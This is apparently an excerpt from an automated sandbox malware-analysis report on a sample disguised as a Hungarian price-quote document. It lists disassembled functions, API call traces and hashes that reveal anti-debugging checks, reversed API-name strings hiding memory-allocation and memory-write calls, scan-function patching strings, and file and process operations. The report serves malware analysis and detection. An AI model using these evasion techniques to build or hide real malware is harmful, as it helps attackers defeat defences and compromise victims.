                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5C6D
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5C7D
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5CA5
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5CB5
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029A5CDB
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029A5CEB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                                                  • Opcode ID: 4af8e7eca47798b63734f01613b73765d54371d55210076268b9e1e427c1e068
                                                                                                                                                  • Instruction ID: d345a91a0c7ab89ebc2d1acd6bd2733589591031e0dc2547b47cf99bdd5035ff
                                                                                                                                                  • Opcode Fuzzy Hash: 4af8e7eca47798b63734f01613b73765d54371d55210076268b9e1e427c1e068
                                                                                                                                                  • Instruction Fuzzy Hash: A951BF75F4035C7AFB25D6A48C56FEFB7BD9B44340F8101A5AA04E6181EBB4DA448FE0
                                                                                                                                                  Function 029B894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 12458 29b894c-29b8971 LoadLibraryW 12459 29b89bb-29b89c1 12458->12459 12460 29b8973-29b898b GetProcAddress 12458->12460 12461 29b898d-29b89ac call 29b7d78 12460->12461 12462 29b89b0-29b89b6 FreeLibrary 12460->12462 12461->12462 12465 29b89ae 12461->12465 12462->12459 12465->12462
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                                                  • Opcode ID: 5260c003f05a19b3810061e344a16d1e85e2e657e4234ad6359eadb61d0f8319
                                                                                                                                                  • Instruction ID: 2498e37cf3a66aa982269384829d0df7eddddcb18aec7b664f2e4d315e5ec9d4
                                                                                                                                                  • Opcode Fuzzy Hash: 5260c003f05a19b3810061e344a16d1e85e2e657e4234ad6359eadb61d0f8319
                                                                                                                                                  • Instruction Fuzzy Hash: 60F0A471EC1314EEE720966CAF49FA7B79CAB89724F0109A9F90887140CE70955A8B50
                                                                                                                                                  Function 029BF744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 12475 29bf744-29bf75e GetModuleHandleW 12476 29bf78a-29bf792 12475->12476 12477 29bf760-29bf772 GetProcAddress 12475->12477 12477->12476 12478 29bf774-29bf784 CheckRemoteDebuggerPresent 12477->12478 12478->12476 12479 29bf786 12478->12479 12479->12476
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 029BF754
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029BF766
                                                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029BF77D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                  • API String ID: 35162468-539270669
                                                                                                                                                  • Opcode ID: 582e9e005a7d25d003539dcfffa6694368e1b60397c114c8c4b5ef28c0faf863
                                                                                                                                                  • Instruction ID: 827ce9d525f4155aadc2aa72dbe847d20188445d8b01d82e0ded1cd8f5006cb9
                                                                                                                                                  • Opcode Fuzzy Hash: 582e9e005a7d25d003539dcfffa6694368e1b60397c114c8c4b5ef28c0faf863
                                                                                                                                                  • Instruction Fuzzy Hash: 5FF0A771904248BAEB11A6B98DC87DCFBAD9F05328F2443D0B435629D1E7710640CA91
                                                                                                                                                  Function 029BDD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDAB
                                                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029BDE40), ref: 029BDDDB
                                                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029BDDF0
                                                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029BDE1C
                                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029BDE25
                                                                                                                                                    • Part of subcall function 029A4C60: SysFreeString.OLEAUT32(029BF4A4), ref: 029A4C6E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1897104825-0
                                                                                                                                                  • Opcode ID: 8a4594e8cecccbcdadf98d51333da911ca6471e0d89038a1a6ea40baa40f6317
                                                                                                                                                  • Instruction ID: 4f5756de0cea297e0fd5e3a2427263157cc190c97badc3c7caee8162e0e69724
                                                                                                                                                  • Opcode Fuzzy Hash: 8a4594e8cecccbcdadf98d51333da911ca6471e0d89038a1a6ea40baa40f6317
                                                                                                                                                  • Instruction Fuzzy Hash: C621C175A40319BAEB51EAE4CD52FDEB7BDEF88700F500465B604F71C0DAB4AA048BA4
                                                                                                                                                  Function 029BE4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029BE5F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                                                  • Opcode ID: beaede18048bd4c666297a0c62522f34a2ad5b5feb5221a1e67eb4051b86b1b7
                                                                                                                                                  • Instruction ID: 9b6ae7bb266db5f15813af7167a457041f80ac071086d55ff5207d6d2e4ac9f2
                                                                                                                                                  • Opcode Fuzzy Hash: beaede18048bd4c666297a0c62522f34a2ad5b5feb5221a1e67eb4051b86b1b7
                                                                                                                                                  • Instruction Fuzzy Hash: D8410035B1024C9FEB12EBA8D951ADEB3FAFFC8700F605435E041A7291DAB4AD118F95
                                                                                                                                                  Function 029BDC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029A4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 029A4F2E
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,029BDD5E), ref: 029BDCCB
                                                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029BDD05
                                                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029BDD32
                                                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029BDD3B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3764614163-0
                                                                                                                                                  • Opcode ID: cd6a81b72ed38561eadb1a1d0af903a06f1c2c285b1b19cf322fd2ecef928648
                                                                                                                                                  • Instruction ID: 6b7e5a4c1b55c5c846f350de9b43bd1cb708aa125c96190ee5eba58a8057c82c
                                                                                                                                                  • Opcode Fuzzy Hash: cd6a81b72ed38561eadb1a1d0af903a06f1c2c285b1b19cf322fd2ecef928648
                                                                                                                                                  • Instruction Fuzzy Hash: AC21ED71A40318BAEB11EAA0CD52FDEB7BDEF88B00F614465B604F75C0D7B06A048AA4
                                                                                                                                                  Function 029B8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                  • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                  • API String ID: 3130163322-2353454454
                                                                                                                                                  • Opcode ID: a65fa411d17544836610c8f39a2dd27d975fb13c2a1c2c37653f1ba8ca92ecbc
                                                                                                                                                  • Instruction ID: 6737a935694f7fd718be790e46f719f19a8aaf641b6cf832d05ebd67765a5ed2
                                                                                                                                                  • Opcode Fuzzy Hash: a65fa411d17544836610c8f39a2dd27d975fb13c2a1c2c37653f1ba8ca92ecbc
                                                                                                                                                  • Instruction Fuzzy Hash: B411C2B2640248AFEB41EEACDE91FAA77EDFB8C700F514460FA08D7240C674ED108B64
                                                                                                                                                  Function 029B7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                  • Opcode ID: 7ead9a6da39cebd7a6d99c2d47fffb7e420aa99b5150a5caddaf6aa592887f24
                                                                                                                                                  • Instruction ID: 38d6eabd46f01b69d54671e8ec16e1825bacd20273d44bcfe40d40ab066cd3cc
                                                                                                                                                  • Opcode Fuzzy Hash: 7ead9a6da39cebd7a6d99c2d47fffb7e420aa99b5150a5caddaf6aa592887f24
                                                                                                                                                  • Instruction Fuzzy Hash: C4113C75640208BFEB01EFA4DD51EEAB7ADEB89700F414460F900D7640DA70AA148B60
                                                                                                                                                  Function 029B7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                  • API String ID: 4072585319-445027087
                                                                                                                                                  • Opcode ID: 75e203dc8f74374f029aaa1bbc4a798dbb4ad72f32a2b3349107b957bf3eae71
                                                                                                                                                  • Instruction ID: efa1b6b9d7b97a0130a1973035045890eec3d7ff5148b487eff5f5541ecd1077
                                                                                                                                                  • Opcode Fuzzy Hash: 75e203dc8f74374f029aaa1bbc4a798dbb4ad72f32a2b3349107b957bf3eae71
                                                                                                                                                  • Instruction Fuzzy Hash: 5C115B75640308BFEB01EFA4DEA1EEEB7ADEFC9700F4144A0F900D7640DA70AA148B60
                                                                                                                                                  Function 029B7D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                  • API String ID: 2719805696-3542721025
                                                                                                                                                  • Opcode ID: ac390abf8189c7d4674a92d76e83dbd75a324ac41d99fe93ff22ae5ea0832304
                                                                                                                                                  • Instruction ID: 5d216793fc2123a4211fabd6ef302743520ef302ebb7fad2ea5db5673125fd0d
                                                                                                                                                  • Opcode Fuzzy Hash: ac390abf8189c7d4674a92d76e83dbd75a324ac41d99fe93ff22ae5ea0832304
                                                                                                                                                  • Instruction Fuzzy Hash: 10015B7A640204AFDB11EF98DD51EDAB7EDEFC9700F515450F804D7650CA70AE108BA0
                                                                                                                                                  Function 029BDBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlI.N(?,?,00000000,029BDC7E), ref: 029BDC2C
                                                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC42
                                                                                                                                                  • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,029BDC7E), ref: 029BDC61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
